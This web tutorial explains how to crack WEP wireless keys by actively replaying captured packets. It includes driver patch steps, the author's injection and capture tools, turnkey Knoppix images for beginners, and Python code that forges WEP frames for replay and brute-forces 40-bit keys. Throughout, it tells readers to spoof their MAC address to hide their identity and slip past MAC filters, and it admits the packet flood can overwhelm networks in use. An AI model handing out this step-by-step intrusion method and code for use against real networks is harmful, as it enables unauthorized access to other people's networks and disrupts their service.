Active WEP cracking

by

L. Padilla

Foreword

I have always liked wireless communications. First it was analog voice radio, then I became interested in digital radio long before 802.11 was developed. Nowadays wireless 802.11 (wifi) equipment has become very cheap and coverage can be found everywhere, so I inevitably fell in love with it. Since I am very interested in security and cryptography, my attention was captured when I first heard about the WEP weakness.

The WEP weakness comes from the way the 802.11 standard misuses the RC4 stream cipher: each packet is encrypted with a per-packet key made by prepending a 24-bit IV to the shared secret, so an eavesdropper sees RC4 run under a large number of closely related keys, and certain IVs (the so-called weak IVs) leak information about the key bytes. Tools soon appeared to demonstrate the weakness in practice. I know of the following tools:

These tools are based on sniffing normal WEP wireless network traffic to collect enough WEP packets, so that they can take advantage of the WEP weakness to recover the WEP key. This approach has the advantage of being passive and therefore undetectable. The disadvantage is that it may require a lot of time (weeks, months, ...) to collect enough packets, especially in case of low traffic or poor signal quality.

I first read in the documentation of Aircrack about the possibility of speeding up the process by resending special packets over the air; they even included a tool and instructions on how to do it. I decided to study this interesting possibility in more detail. The first problem I met was that the method required two non-USB wireless cards with the Prism2 chipset. Hell! I didn't even have one! Later the method was refined so that you can use just one card, but I still didn't have any. Additionally the method was rather complicated: you have to use the HostAP software to turn your PC into an access point and then use the send & capture tools. Recently the process seems to have been simplified and support for more chipsets has been added.

Since I have several different wireless cards, I tried to reproduce this method (as simply as possible) with them before thinking about buying a Prism2 card (or two). I succeeded, and here I describe the technique and the steps required, and provide the software needed. With this kind of attack you can obtain a WEP key in a time which varies from minutes to hours depending on the key itself, the key length and whether the access point uses or filters out weak IVs.

Requirements

First of all you need a wireless card with the same chipset as one of mine. I'm sorry about that, but I don't have access to all kinds of hardware to test it. Unfortunately wireless hardware and drivers are still not mature enough for any software to work with any card, especially when you are interested in low level features. Nevertheless I might add support for new hardware depending on its (and my) availability. If you dare, you can try to repeat the same steps with a different chipset to see if it works too, but in the best case you will surely have to modify the driver at least.

My first wireless adapter was a D-Link DWL-G650+ CardBus card, so for now you can use a card with the Texas Instruments (TI) ACX111 chipset. I have not tested the ACX100 chipset or USB devices, but they might work as well. See the following links to check if your card has a TI ACX111 chipset:

My second wireless adapter is a Cnet CWP-854 PCI card, so for now you can also use a card with the Ralink RT2560 chipset. Later I have used other adapters with the RT2570 and RT73 chipsets (both USB), so you can use those as well. I have not tested the RT2400 chipset, but it might also work. See the following links to check if your card has a RT2560, RT2570 or RT73 chipset:

The second thing you will need is a PC with a relatively recent linux distribution (Suse 9.2, Fedora 2, Knoppix 3.7 or newer releases are OK; I haven't tested older or other distributions). Your linux should have network support and certain software: wireless tools, csh or tcsh, tcpdump, libpcap, patch and gcc. Other features and software are needed but they are always present in any recent (and decent) distribution, at least with the profile described above. Usually all required software is installed by default; if not, just install the corresponding packages. If you don't have linux and can't install it, you can run it live from CD, as is the case with Knoppix and other distributions. Below I provide precompiled software and special instructions for use with Knoppix, so you won't even need to install linux, although it will be a pity ;-).

Finally you will need coverage of a WEP enabled wireless network. Be aware that, by default, the attack is very aggressive; it may overwhelm the access point, so be very careful when choosing the network to test.

First steps

If you want to do passive WEP cracking your card must support monitor mode. In this mode all packets passing by on the same channel are captured, no matter which client or access point they belong to or whether they are data or 802.11 management packets. In addition packets are captured unmodified, with their 802.11 header, etc. Not all cards support monitor mode, mainly because of driver limitations. The ACX111, RT2560, RT2570 and RT73 chipsets and their open source linux drivers support it, but at the time of this writing both drivers require a patch (see below). If you have another chipset your first step is to check for monitor mode; usually it is documented in the driver. If it is not supported you'll have to get another card or wait until the driver supports it, or, if you are impatient and skilled, implement it yourself together with the open source driver development team.

If you want to carry out active WEP cracking with just one wireless card, you have to send and receive packets at the same time while in monitor mode. It seems not all cards are able to do this. I don't know why, because in normal operation the card does it: you constantly send and receive packets when using the network. It should make no difference whether you are in monitor mode because, in principle, the only difference from normal mode is that certain packets which the chipset would discard or keep to itself are now passed to the driver. At first I thought no card had that feature, but to my surprise I found that the ACX111 chipset was capable of it, and later I checked that the RT2560, RT2570 and RT73 chipsets have the feature as well.

So if you have a different chipset you should find out the status of this question. Sometimes it is documented in the driver; if not, do a simple experiment: join a network (it does not matter whether it is WEP enabled or not, or whether you have the WEP key), assign any network address to the interface, start pinging any host, switch to monitor mode, start a network analysis tool like tcpdump (run "tcpdump -i wlan0 -nl" as root, mind the interface name) and observe. If tcpdump shows that after every outgoing ping there is an 802.11 ACK control frame coming in (the ACK is a control frame, not a management one: it is the receiver's immediate acknowledgement of your data frame), then you are lucky. You might even see echo replies arriving if your network is set up right, but don't expect the ping command to show them, because the network stack cannot interpret packets whose 802.11 header has not been removed.

There are several reasons why the experiment may fail even if the card is capable of sending packets while in monitor mode. One is that the driver disables transmission in that mode just for safety reasons; then you can only read the source code (or ask the developers) to check whether this is the case, and if so remove that limitation. Note that packet observation might be difficult in a busy network; in that case a tcpdump packet filter that restricts the output to ACK control frames and your own ICMP echo requests will help.

If no matter what you do you still can't make your card emit packets while in monitor mode, there might still be a chance to perform an active WEP cracking attack with a single card of that type. The method consists in sending packets in normal mode, switching to monitor mode to listen for the answers, then switching back to normal mode to send more packets, and so forth. In theory this is always possible, but one has to check that the time to switch from normal to monitor mode is shorter than the time needed for the answer of the access point (or other client) to reach you, which seems to be typically of the order of a few milliseconds. This is a long time for a computer, so in principle this scheme should work with any card. That was my first idea for an active attack until I discovered the excellent ACX111 feature (and later the same for the RT2560, RT2570 and RT73). The method should be tuned for optimum performance: the card sends packets until the first answer arrives, and then listens for the same amount of time to collect all the answers. So the best case is when the card spends 50% of the time sending packets and the other 50% receiving their answers, each interval lasting the round-trip time of one packet and its answer. Therefore this method can never reach an efficiency above 50% (in practice it will always be lower because you have to account for the time to switch between modes), while with an ACX111, RT2560, RT2570 or RT73 (or another chipset with the desired feature) you get 100%. Of course you can always use two or more cards to reach and even exceed 100% efficiency.

Active WEP cracking also requires the ability to send raw packets through the wireless driver. As far as I know this feature is not present in any driver, so you will surely have to patch it, as I did for the ACX111 and for the RT2560.

The theory

The basic principle of an active attack is to send packets into the WEP network to increase the traffic and so speed up the WEP key cracking. The problem is that packets that are not WEP encrypted with the right key are ignored by the access point and the clients. To overcome this problem one can take advantage of one of the numerous WEP weaknesses: packet replay. WEP adds no timestamp, sequence counter or MAC (Message Authentication Code) that would let a receiver recognise a replayed packet; its only integrity check is an unkeyed CRC-32 (the ICV), computed over the payload alone and encrypted with the same RC4 keystream. The same ethernet packet is therefore always converted into the same WEP packet when the same IV is used (the IV is chosen by the sender and is not part of the ethernet data), so you can inject a previously seen packet and no one will notice.

If you inject a randomly chosen packet among the ones captured flying around, you will normally not get any client answer. This is because the transport protocols carrying most traffic reject replayed or out-of-date packets: TCP discards a segment that does not fit the current window and connection state, and most UDP exchanges are tied to transaction state that the replayed datagram no longer matches. So even though WEP allows replay, the protocols above it do not. However if you replay a broadcast packet, which obviously does not belong to any TCP or UDP session, you will receive the answers, if any. You might not receive any answer simply because there is no client willing to give one; it may even be that the original packet got no answer either. Therefore you should try to choose a packet which does receive at least one answer. Usually ARP requests are answered, provided that the host whose ethernet address you are asking for is still alive (the access point gateway is always alive). The problem is how to recognise ARP packets. There are several techniques. One is based on the packet size: an ARP request has a fixed 28-byte payload (plus the 8-byte LLC/SNAP header that precedes it on 802.11), so its encrypted frames all have the same small, characteristic length. Another is to listen for the very first broadcast packets after a host joins the network, which should be ARPs. Or you can simply capture all broadcast packets for a while, then replay them and observe which of them get answers.

Actually things are simpler than this: you don't need any client answer. When you send a WEP packet it is first received by the access point, which decrypts it and, if it is valid (correct encryption and ICV), re-encrypts it with another IV and resends it to the other clients. Depending on the destination address the access point might not send the packet over the air but forward it to the wired network instead. However a broadcast packet will always be sent over the air. Broadcast packets have another advantage: they are sent at a low basic rate (usually no more than 11 Mbps), which increases the probability that the access point will receive your packets and that you will receive its answers. Of course you will send and receive fewer packets per second than if you were using a higher transmission rate (e.g. 54 Mbps), but it is worth it, especially in cases of poor signal quality.

Summarizing, your best choice is the smallest broadcast packet (so that it takes less time to send and receive) which receives the most answers. It will get at least the access point's re-broadcast, and if it gets one or more client answers as well that is an extra benefit: the number of packets is multiplied. Actually you don't even need to capture a broadcast packet, because the 802.11 header can be forged, so any captured packet can be turned into a broadcast packet. Such a packet will not receive any client answer, but you will receive the packet re-sent by the access point. More on packet forgery later.

Preparing the attack

The first thing you need to perform the attack is a proper linux driver for your wireless adapter. Note that it may require modification and recompilation to add the needed support if it is not included in the standard driver. This is the case for the ACX111 and RT2560 chipsets. Separate instructions are given below for each driver.

ACX111 driver procedure

When I started this project the driver lacked several key features: WEP support, WEP sniffing and the capability to send raw packets. With the help of the open source driver developers I managed to add the required features. All the work was done with version acx100-0.2.0pre8_plus_fixes_43, to which you have to apply my ACX111 patch for the required features. Just download both files, go to that directory and follow these instructions:

Linux prompt>tar -xjf acx100-0.2.0pre8_plus_fixes_43.tar.bz2

Linux prompt>patch -p0 < wepacx111_and_others.patch

Linux prompt>cd acx100-0.2.0pre8_plus_fixes_43

Linux prompt>make config.mk

Check whether there is any warning about something you lack; if so, fix it and then:

Linux prompt>make

The process might end with errors at the USB module compilation stage. If so, ignore the error but check that the PCI module was created as src/acx_pci.ko or src/acx_pci.o.

If you want to install this driver as the default ACX driver then (as root):

Linux prompt>make install

In case of compilation errors in the USB module you will have to do a manual installation, simply by doing something like (as root):

cp src/acx_pci.ko /lib/modules/`uname -r`/kernel/drivers/net/wireless/
depmod -a

You may prefer not to install this driver as default because it is not the latest one. Actually the required features may have already been implemented in the latest driver release, but I have not tested it. So you may try to download the latest distribution, do not patch it, compile and install it. Then test the active WEP crack as explained below to see if it works. If not then download the release linked above, patch it, compile but do not install it. Instead copy the module acx_pci.ko or acx_pci.o (depending on your kernel version) from acx100-0.2.0pre8_plus_fixes_43/src into the working directory where you will run the tools given below. This way active WEP cracking will use the old patched but successfully tested driver, while normal linux operation will use the brand new driver you installed.

(Update: the latest legacy driver I tested, version 20060521, for ACX111 does implement all the required features, but it fails when trying to change the MAC of the adapter. This is not a strictly needed feature, but sometimes it is convenient, so here is a patch to fix the MAC change problem for that version.)

RT2500 driver procedure

When I started working with this chipset the driver lacked several required features: sniffing of all packets in monitor mode (certain types were missed) and the capability to send raw packets. Thanks to an open source and well documented driver I managed to add the required features. All the work was done with version rt2500-1.1.0-b3, to which you have to apply my RT2500 patch for the required features. Just download both files, go to that directory and follow these instructions:

Linux prompt>tar -xzf rt2500-1.1.0-b3.tar.gz

Linux prompt>patch -cp0 < rawrt2500_and_others.patch

Linux prompt>cd rt2500-1.1.0-b3/Module

Linux prompt>make

If you want to install this driver as the default RT2500 driver then (as root):

Linux prompt>make install

You might prefer not to install this driver as default if it is not the latest one. Actually the required features might have already been implemented in a later driver release. So you may try to download the latest distribution, do not patch it, compile and install it. Then test the active WEP crack as explained below to see if it works. If not then download the release linked above, patch it, compile but do not install it. Instead copy the module rt2500.ko or rt2500.o (depending on your kernel version) from rt2500-1.1.0-b3/Module into the working directory where you will run the tools given below. This way active WEP cracking will use the old patched but successfully tested driver, while normal linux operation will use the brand new driver you installed.

(Update: Latest legacy drivers for RT2500, RT2570 and RT73 (and possibly for the other Ralink chipsets) do implement all the required features.)

Common procedure

Your next step is to install Aircrack (now Aircrack-ng, whose command line options may not be backwards compatible, so you may need to change some things in the script) in the execution path if you want AirMonitor to find the WEP key automatically. Finally you just have to start the attack. Simply download the following tools:

(Update: in order to speed up the attack in certain cases, you will also need these files: WLAN Brute Active, WLAN Brute Passive, airmon script (set the execution bit on the three scripts after download), brute force packet, and a patch for the last available version of Aircrack, 2.41.)

Compile the two C files (see the source for instructions) and edit the csh script to configure it with your particular data (see the source for instructions). (Update: configuration of the script is now also possible through command line arguments; execute it with '-h' to see the options.) Basically you have to configure the ESSID, MAC and channel of the access point you want to crack. If you run AirMonitor without configuring the ESSID it will show the list of visible access points. Optionally you can configure the output data path (if there is not enough free disk space in the current directory), the MAC you want to set on your interface (this allows you to disguise your identity and bypass any MAC filter in the access point) and the capture mode (weak or full). The first mode captures only weak IV packets; it is recommended if you are short of disk space, but will not work with modern access points which skip weak IVs (or most of them). In that case you will have to configure the full mode (you'll need several hundred megabytes of free disk space). Finally you can configure some technical data if auto detection does not work, like the module name (acx, acx_pci, rt2500, rt2570 or rt73), the wireless interface name and the firmware directory in the case of an ACX111 chipset.

(Update: now there are two new options to speed up the attack. One enables a specific attack for routers with an ESSID of the form WLAN_XX, where XX is a two digit hexadecimal number. Those routers usually have a predictable default WEP key which can be recovered from just one captured data packet. This option is enabled by default, and if the chosen ESSID is not of that type the option is automatically disabled. If the AP under attack is of that type but does not use the predictable default key, the option is also automatically disabled and the attack continues as for any other kind of router. The second new option is provided to attack an AP without traffic. As far as I know this is the only tool able to do that. The attack consists in sending special packets to try to force the AP to answer with a valid WEP data packet which, once captured, allows the normal attack to proceed. It only works with adapters with Ralink chipsets. Depending on the kind of router, the attack may succeed within a few seconds, may take hours or days, or may not work at all. In any case you won't lose anything by trying, because as soon as there is normal traffic in the network the attack continues as usual. However this option is disabled by default because it is very aggressive; nevertheless note that when a packet is captured and the active attack begins, it gets aggressive anyway, that is what "active WEP cracking" is about :-)

AirSend is the program responsible for the active part of the attack: it replays packets from the pcap file you give it as a parameter. There can be more than one packet in the file. You can control how many times the file is replayed (with the -c option; 0 means replay forever) and at what speed (with the -d option, which sets the number of microseconds to wait between consecutive packets; a negative value means as fast as it can). Note that values below one millisecond are not useful because this is not a real-time process: the kernel will schedule it out and typically not resume it until several milliseconds later. Some other options are provided to forge the 802.11 header (the FC, A1, A2 and A3 fields), so that, for example, any packet can be replayed as a broadcast going from a client to the access point even if it actually was a unicast packet going from the access point to a client; the WEP payload remains perfectly valid, because the ICV does not cover the 802.11 header.

WeakCap is provided in case you are short of disk space (as I was), so that the total disk space required for a successful WEP crack is only a few megabytes. However it will take more time to collect enough packets to find the WEP key. Note that it is not useful if the access point skips weak IVs, something common in newer hardware.

AirMonitor takes care of initializing and configuring the wireless adapter, brings all the pieces together to perform the active attack and, most importantly, monitors the free disk space and checks that the card is operating well. From time to time my ACX111 card stops collecting packets when performing the attack; I don't know whether it is a problem of the driver, the adapter, some other element or simply that the attack is too heavy. It is fixed by reloading the driver, so the script checks for this condition and, if found, reinitializes the card to keep the attack going. AirMonitor will also start Aircrack when enough data has been collected and will restart it each time a substantial amount of new data is captured. When the key is found it is displayed on screen (and saved in a file) and the attack is stopped.
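The header forgery described in the theory section and implemented by AirSend's FC/A1/A2/A3 options, together with the weak-IV filter that WeakCap applies, as an added Python example (this is not the author's code nor part of the tools above). It parses a WEP data frame, re-addresses it as a client-to-AP broadcast while leaving the WEP body (IV, key id, ciphertext and ICV) byte for byte intact, and classifies IVs by the original FMS weak-IV form (A+3, 0xFF, X). The MAC addresses, the sample frames and their payload bytes are constructed for the example; a QoS data frame (which carries two extra header bytes) is rejected rather than mis-sliced.

```python
import struct

# 802.11 data-frame header: frame control (two octets), duration, address 1,
# address 2, address 3, sequence control.  24 bytes, little-endian fields.
HDR = struct.Struct("<BBH6s6s6sH")

TYPE_DATA = 0x08        # fc octet 0: type bits = 10 (data), subtype 0
SUBTYPE_QOS = 0x80      # fc octet 0: subtype bit 3 marks QoS data (2 extra header bytes)
FLAG_TO_DS = 0x01       # fc octet 1 flags
FLAG_FROM_DS = 0x02
FLAG_RETRY = 0x08
FLAG_PROTECTED = 0x40   # "WEP" bit: body is IV(3) + key id(1) + ciphertext + ICV(4)
BROADCAST = b"\xff" * 6


def parse_wep_data_frame(frame: bytes) -> dict:
    """Split a WEP-protected 802.11 data frame into header fields and the WEP body."""
    if len(frame) < HDR.size + 8:
        raise ValueError("frame too short for a WEP data frame")
    fc0, fc1, duration, a1, a2, a3, seqctl = HDR.unpack_from(frame)
    if fc0 & 0x0C != TYPE_DATA:
        raise ValueError("not a data frame")
    if fc0 & SUBTYPE_QOS:
        raise ValueError("QoS data frames carry an extra 2-byte header; not handled here")
    if not fc1 & FLAG_PROTECTED:
        raise ValueError("frame is not WEP-protected")
    body = frame[HDR.size:]
    return {
        "to_ds": bool(fc1 & FLAG_TO_DS),
        "from_ds": bool(fc1 & FLAG_FROM_DS),
        "a1": a1, "a2": a2, "a3": a3,
        "duration": duration, "seq": seqctl >> 4,   # upper 12 bits: sequence number
        "iv": body[:3], "key_id": body[3] >> 6,
        "body": body,                                 # IV + key id + ciphertext + ICV, untouched
    }


def forge_broadcast_to_ap(frame: bytes, bssid: bytes, source: bytes, seq: int = 0) -> bytes:
    """Re-address any WEP data frame as a client->AP broadcast, keeping the WEP body.

    ToDS=1/FromDS=0 address layout: A1 = BSSID, A2 = source station, A3 = destination.
    The WEP ICV covers only the encrypted payload, not the 802.11 header, so the AP
    still decrypts and verifies the body, then re-broadcasts it under a fresh IV.
    """
    p = parse_wep_data_frame(frame)
    fc0 = frame[0]
    fc1 = (frame[1] | FLAG_TO_DS) & ~FLAG_FROM_DS & ~FLAG_RETRY & 0xFF
    seqctl = (seq & 0xFFF) << 4       # assumption: the injecting driver sends this field as given
    return HDR.pack(fc0, fc1, p["duration"], bssid, source, BROADCAST, seqctl) + p["body"]


def is_fms_weak_iv(iv: bytes, key_len: int = 13) -> bool:
    """Original FMS weak-IV class (A+3, 0xFF, X), A indexing a key byte.

    key_len is in bytes: 5 for 40-bit, 13 for 104-bit keys, so the first IV byte
    lies in 3 .. key_len+2 and the second is always 0xFF.
    """
    return len(iv) == 3 and 3 <= iv[0] <= key_len + 2 and iv[1] == 0xFF


def weak_iv_frames(frames, key_len: int = 13) -> list:
    """Keep only the frames a WeakCap-style capture filter would store."""
    kept = []
    for f in frames:
        try:
            p = parse_wep_data_frame(f)
        except ValueError:
            continue                     # management/control/unprotected frames: skip
        if is_fms_weak_iv(p["iv"], key_len):
            kept.append(f)
    return kept


# Constructed sample: an AP -> client unicast; the ciphertext bytes are opaque filler.
BSSID = bytes.fromhex("00112233aabb")      # hypothetical AP MAC
CLIENT = bytes.fromhex("00aabbccdd01")     # hypothetical client MAC
CIPHERTEXT = bytes(range(36)) + b"\xde\xad\xbe\xef"   # 36 payload bytes + 4-byte ICV


def sample_frame(iv: bytes) -> bytes:
    fc1 = FLAG_FROM_DS | FLAG_PROTECTED
    return HDR.pack(TYPE_DATA, fc1, 0x2C, CLIENT, BSSID, BSSID, 0x10 << 4) + iv + b"\x00" + CIPHERTEXT


if __name__ == "__main__":
    frames = [sample_frame(b"\x03\xff\x1a"), sample_frame(b"\x1c\x21\x05")]
    forged = forge_broadcast_to_ap(frames[0], BSSID, CLIENT, seq=1)
    print(parse_wep_data_frame(forged))
    print(len(weak_iv_frames(frames)), "weak-IV frame(s) kept")
```

Two checks before injecting a frame built this way: captures from some drivers keep the 4-byte FCS at the end of the frame, which would end up inside what this code treats as the WEP body, so strip it first; and an access point only relays data frames whose source address (A2) belongs to an associated station, which is why AirMonitor associates with the AP (and sets the interface MAC) before the replay starts.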

The attack

When you have everything set up, the attack is started simply by executing the script AirMonitor as root. It will take care of running the rest of the required programs. A temporary pcap file storing the captured packets will appear in the output directory. Each time the card hangs, the content of this file is appended to another pcap file named after the ESSID of the access point under attack.

The attack is performed at the highest possible speed to collect as many packets as possible. Therefore the access point and even the clients may experience a severe slow down, so it is advisable to run the attack when no one is using the network, at least interactively. I've reached speeds of more than one thousand packets per second, but poor wireless coverage will proportionally decrease that speed; a good antenna, especially a very directional one, may enhance the rate a lot.

AirMonitor will run until the WEP key is found by the automatically launched Aircrack process. At a speed of 1000 packets/s you can collect 3.6 million packets per hour, so the WEP key can be found in less than 5 minutes of attack (the actual time depends on the packet rate, the key itself, the key length and statistical fluctuations). This holds if the access point does use weak IVs; if not, it may take a few hours of continuous attack (though it can be split into several sessions) to gather enough packets for Aircrack to find the WEP key.

AirMonitor can be interrupted at any time with ctrl-c, but it may leave some running processes and temporary files behind. The best moment to stop it is when it is waiting to associate with the AP (the output on screen announces this condition and says that it is the best moment to interrupt the script). When you restart AirMonitor everything is set up properly again and no data is lost. So the best trick to stop AirMonitor at any desired time is to hit ctrl-c, restart it and interrupt it again when it is waiting for association. This way all files are closed properly and no processes are left running, except Aircrack, which you have to stop manually; otherwise it will run until the key is found or it gives up.

Active WEP cracking for dummies

If you say "fine, but I do not dare installing linux and doing everything else", this section is for you. Here are instructions and precompiled binaries so you need almost no linux knowledge. First download the Knoppix 3.9 CD image (better look for your nearest mirror) and burn it onto an 80 min CD, then download this package and unpack it onto a floppy disk, USB memory stick or a directory on a hard disk partition. Use a text editor to configure the variables at the beginning of the file airmonitor.csh as explained above, or use command line arguments. If you are using an ACX111 card don't forget that the firmware file has to be accessible to Knoppix: if you did not install the card driver on a windows partition, copy the firmware file to the working directory. The firmware file can be found on the manufacturer's driver media or, if you installed the driver on your windows partition, usually in c:/windows/system32/drivers, and is commonly named TIACX111.BIN, FwRad*.bin or FW*.bin (see the section "Firmware for ACX111 cards" of the ACX driver documentation for more details). You can also download it here, but rename it to TIACX111.BIN.

Now place the Knoppix CD in the CD reader and boot the computer from it; in case of a problem see the Knoppix help. Once linux has booted press Ctrl-Alt-F1 to get a root shell and mount the media where you placed the tools. This is achieved with a command like "mount /mnt/fd0", "mount /mnt/sda" or "mount /mnt/hda1" for a floppy, USB memory stick or hard disk partition respectively. The actual device may depend on your particular setup; execute "ls /mnt" to see the list of devices accessible to Knoppix. Then go to the directory with a command like "cd /mnt/fd0", "cd /mnt/sda", "cd /mnt/hda1" or similar depending on your configuration. Finally type "./airmonitor.csh" to start the attack and collect packets; be sure to have enough free space in the data directory. And that's all: AirMonitor will tell you when the WEP key is cracked by Aircrack.

Active WEP cracking for extreme dummies (or for lazybones ;-)

(Recommended choice for non linux experts!)

Ok, I actually did all the work for you, so simply download my prepared 700 MB Knoppix CD image, which includes everything required, ready to run. Then you just have to boot from this CD (pay attention to selecting the proper keyboard layout at boot; it defaults to the Spanish layout). This image boots into text mode by default, but you can boot into graphics mode if you like (it takes more time to boot and uses more resources). Once you have a root shell prompt type the command ". /cdrom/CheapHighTech/bin/setup". Then execute "airmonitor.csh" without parameters to see whether your wifi card is detected and to show the APs around. Note the required parameters of the AP you want to attack (ESSID, MAC and channel) and execute the script with those parameters, like this: "airmonitor.csh <ESSID> <MAC> <channel>"; this is usually enough. There are other command line arguments available; run "airmonitor.csh -h" to see them all. Look inside the script for a short explanation of each parameter. Note that in this mode all data is written to memory; this is usually OK on recent systems, but old systems may run out of memory. If the computer hangs or resets, all recorded data is lost. You can avoid these problems by using a hard disk, USB pen drive, etc., selecting it with the corresponding command line argument.

Summary

Here are the steps for a quick start if you have a USB, PCI or CardBus wireless adapter based on the ACX111, RT2560, RT2570 or RT73 chipsets and a standard linux distribution, details can be found in the text above:

Simplified variant using Knoppix:

Even more simplified variant using my prepared Knoppix: (Recommended choice for non linux experts!)

Another approach

Just for completeness it is interesting to mention another way of cracking a WEP network, based on a brute force attack that tries to find the right key simply by checking many combinations. The best way to accomplish that is to capture a couple of WEP packets (really only two are needed, the smaller the better; you can use the same method as described above for capturing a broadcast packet) and run an offline key search against them: a candidate key is right if the decrypted packet's ICV checks out, and the second packet rules out the occasional false match of the 32-bit ICV.

A brute force search would, in principle, try all possible key combinations to find the right WEP key. However this is not very practical because it may take too much time. For the weakest WEP key (40 bits, about 10^12 candidates) it would take several months on a fast PC (faster using several computers in parallel), but for a stronger key (104 bits and above) there is not enough computing power in the world to have a realistic chance of finding the key in a reasonable time.

A very quick approach, only practical for 40 bit WEP keys, is to restrict the search to keys composed only of 7 bit ASCII printable characters (in case the key was typed in ASCII mode by the network administrator: 95^5, about 7.7 billion candidates) or to keys whose hexadecimal digits are all decimal digits (in case the administrator typed the key in hexadecimal mode using only digits: 100^5, 10 billion candidates). Both are common in poorly secured networks. Restricting the key search in that way, a modern PC can try all combinations in less than 24 hours for either case. I wrote a couple of very simple programs to try this attack using the decrypt tool included in the AirSnort package. To try them simply download the FindWEPkey HEX and ASCII versions, configure the system function call according to your case and compile (see the source for details). You will need the AirSnort tool decrypt compiled and installed in your execution PATH.
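The restricted brute force, as an added Python example (not the author's FindWEPkey programs, which drive AirSnort's decrypt instead): it implements WEP's RC4/CRC-32 encapsulation so that a candidate key can be verified offline by its ICV, enumerates the two restricted key spaces above as a mixed-radix index so the work can be split into ranges across machines, and confirms any hit on a second packet. The key, IVs and payloads of the sample capture are constructed for the example; the chunk searched in the usage below is deliberately tiny so it finishes in seconds, while the full spaces are about 7.7 billion and 10 billion candidates.

```python
import zlib
from typing import Optional, Sequence


def rc4(key: bytes, length: int) -> bytes:
    """RC4 keystream: KSA over `key`, then `length` PRGA output bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes, key_id: int = 0) -> bytes:
    """WEP frame body: IV | key id | RC4(iv||key) xor (plaintext | CRC-32 ICV)."""
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    stream = rc4(iv + key, len(plaintext) + 4)
    cipher = bytes(a ^ b for a, b in zip(plaintext + icv, stream))
    return iv + bytes([(key_id & 3) << 6]) + cipher


def wep_decrypt(key: bytes, body: bytes) -> Optional[bytes]:
    """Decrypt a WEP body with `key`; return the plaintext if the ICV verifies, else None."""
    iv, cipher = body[:3], body[4:]
    stream = rc4(iv + key, len(cipher))
    plain = bytes(a ^ b for a, b in zip(cipher, stream))
    data, icv = plain[:-4], plain[-4:]
    return data if zlib.crc32(data).to_bytes(4, "little") == icv else None


# Restricted alphabets for a 40-bit (5-byte) key.
HEX_DIGITS_ONLY = bytes(int("%d%d" % (a, b), 16) for a in range(10) for b in range(10))  # 100 values
ASCII_PRINTABLE = bytes(range(0x20, 0x7F))                                                 # 95 values
KEY_LEN = 5


def space_size(alphabet: bytes, key_len: int = KEY_LEN) -> int:
    return len(alphabet) ** key_len


def candidate(index: int, alphabet: bytes, key_len: int = KEY_LEN) -> bytes:
    """Map a search index (mixed radix, most significant byte first) to a key."""
    digits = []
    for _ in range(key_len):
        index, r = divmod(index, len(alphabet))
        digits.append(alphabet[r])
    return bytes(reversed(digits))


def key_index(key: bytes, alphabet: bytes) -> int:
    """Inverse of candidate(); handy for splitting the space among several machines."""
    index = 0
    for b in key:
        index = index * len(alphabet) + alphabet.index(b)
    return index


def brute_force(bodies: Sequence[bytes], alphabet: bytes, start: int, stop: int) -> Optional[bytes]:
    """Try keys candidate(start) .. candidate(stop-1) against the captured WEP bodies.

    The first body is the cheap filter; a 32-bit ICV accepts a wrong key with
    probability 2^-32, so over ~1e10 candidates a few false hits are expected,
    which is why the remaining bodies must also verify before a key is reported.
    """
    first, rest = bodies[0], bodies[1:]
    for index in range(start, stop):
        key = candidate(index, alphabet)
        if wep_decrypt(key, first) is None:
            continue
        if all(wep_decrypt(key, body) is not None for body in rest):
            return key
    return None


# Constructed sample capture: two short LLC/SNAP+ARP-sized payloads under a digits-only key.
SECRET = bytes.fromhex("3141592653")     # typed in hex as "31 41 59 26 53": digits only
CAPTURE = [
    wep_encrypt(SECRET, b"\x07\x01\x02", b"\xaa\xaa\x03\x00\x00\x00\x08\x06" + bytes(28)),
    wep_encrypt(SECRET, b"\x1c\x21\x05", b"\xaa\xaa\x03\x00\x00\x00\x08\x06" + bytes(range(28))),
]

if __name__ == "__main__":
    target = key_index(SECRET, HEX_DIGITS_ONLY)
    # One small chunk of the digits-only space, as a single worker of a parallel run would get.
    found = brute_force(CAPTURE, HEX_DIGITS_ONLY, target - 2000, target + 2000)
    print(found.hex() if found else None, "out of", space_size(HEX_DIGITS_ONLY), "candidates")
```

The ICV is the only thing that distinguishes a right key from a wrong one here, so roughly one wrong key in four billion passes the first packet; over a ten billion candidate space that is a couple of false hits, which the second captured packet removes. Real captures also need the 24-byte 802.11 header (and a trailing FCS, if present) stripped before the body is handed to wep_decrypt.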

In case of stronger WEP keys (104 bit and above) or WPA, the only viable key search is a dictionary attack, in which a list of words, numbers and combinations of them is tried sequentially to see whether any matches a poorly chosen passphrase or key. See Aircrack (now Aircrack-ng), coWPAtty and WPA Cracker (dead link).

Conclusions

As we have seen, it is very easy and quick to break into a WEP protected network, no matter how long the WEP key is, how low the network traffic is or whether weak IVs are filtered out. So administrators willing to protect their networks should move to a stronger protocol like WPA (or WPA2), always taking care to choose robust passphrases.


E-mail: padilla at domain "gae ucm es" (my PGP/GPG public key)
First version: 8-Apr-2005, last update: 7-Dec-2009
This link: http://www.gae.ucm.es/~padilla/extrawork/activewepcrack.html